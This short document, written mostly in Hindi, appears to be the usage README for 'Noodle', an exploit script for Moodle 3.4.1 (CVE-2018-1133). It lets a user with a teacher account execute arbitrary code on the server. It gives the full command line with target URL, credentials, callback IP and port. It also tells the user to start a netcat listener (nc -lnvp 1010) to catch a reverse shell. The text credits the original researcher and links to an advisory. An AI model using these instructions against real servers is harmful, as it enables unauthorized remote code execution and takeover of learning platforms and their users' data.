
Noodle [Moodle RCE] (v3.4.1) - CVE-2018-1133
एक शिक्षक भूमिका वाला उपयोगकर्ता मनमाना कोड निष्पादित कर सकता है।
php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1
user खाता उपयोगकर्ता नाम
pass खाते का पासवर्ड
ip कॉलबैक आईपी
port कॉलबैक पोर्ट
course शिक्षक से संबंधित मान्य पाठ्यक्रम आईडी
सुनिश्चित करें कि आप इस स्क्रिप्ट को निष्पादित करने से पहले निर्दिष्ट पोर्ट पर एक netcat लिसनर चला रहे हैं।
nc -lnvp 1010
यह सुनने वाले आईपी और पोर्ट पर एक रिवर्स शेल खोलने का प्रयास करेगा।
यह शोषण Robin Peraglie द्वारा प्रदान की गई जानकारी पर आधारित है।
अतिरिक्त पठन: https://blog.ripstech.com/2018/moodle-remote-code-execution